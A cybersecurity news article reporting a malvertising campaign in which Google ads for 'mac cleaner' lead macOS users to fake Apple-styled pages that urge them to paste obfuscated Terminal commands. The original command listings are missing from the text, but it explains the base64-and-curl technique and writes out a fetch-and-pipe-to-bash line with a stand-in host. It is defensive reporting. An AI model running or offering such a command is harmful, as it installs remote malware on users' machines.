Cybercriminals have hijacked Google Search Ads for “mac cleaner” queries, tricking macOS users into visiting fake sites that mimic Apple’s design.
These sponsored results promise quick storage fixes but deliver remote code execution (RCE) payloads.
Security researchers exposed the scheme, revealing obfuscated commands that download and run malware silently. Google Ads accounts, possibly compromised, fuel the abuse.
The scam starts innocently. Users searching for “mac cleaner” see top sponsored links from seemingly legit advertisers like “Nathaniel Josue Rodriguez” or “Aloha Shirt Shop.”
Clicks lead to Google Apps Script pages (script.google.com/macros) styled like Apple’s site, complete with non-functional navigation menus.
Fake instructions urge users to “check storage” or “free up disk space” via Terminal commands. Researchers warn: Do not run them.
One malicious page pushes this command chain:
The “echo ‘Cleaning macOS Storage…’” distracts users, mimicking routine maintenance. The real threat hides in Base64 encoding.
The base64 -D flag decodes it into a shell command that fetches and executes a remote script with user permissions. No actual cleaning occurs it’s pure social engineering for RCE.
A second page uses a more stealthy approach:
Here, $(...) substitutes command output. It decodes a hidden URL, then curl -fsSL silently downloads (-f fails quietly, -s suppresses progress, -S shows errors only, -L follows redirects) and pipes the script to bash for instant execution.
This equals curl https://suspicious-site.com/script.sh | bash but obfuscated to evade detection.
These payloads grant attackers full shell access. Downloaded scripts could:
Silent flags ensure no pop-ups alert victims. This tactic mirrors common vectors like fake GitHub READMEs, malware installers, and supply chain attacks.
macOS’s user-level execution limits root damage but still risks data theft and persistence via user-writable paths.
According to MacKeeper, researchers confirmed the ads redirect from trusted-looking domains like docs.google.com previews to these scripts. No CVEs tie directly, but it exploits user trust in Google and Apple branding.
Advertiser profiles raise red flags. “Nathaniel Josue Rodriguez” (Google Transparency ID: AR03742598973764927489) runs benign ads elsewhere.
“Aloha Shirt Shop” (AR00152784596742701057) shows one suspicious entry. Hacked accounts likely explain the breach verified advertisers get prime ad placement, amplifying reach.
This malvertising wave targets macOS users seeking disk cleanup amid growing storage needs. Similar scams hit Windows “PC optimizers” before.Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google
Exclusive Cyber Security News platform that provide in-depth analysis about Cyber Attacks, Malware infection, Data breaches, Vulnerabilities, New researches & other Cyber stories.
Contact Us: cyber.press@outlook.com
© Copyright 2024 – Cyber Press
Malicious ‘Mac Cleaner’ Ads On Google Redirect Users To Phishing Nightmares – Cyber Press
Related Posts
fev 2, 2026
fev 2, 2026
fev 2, 2026
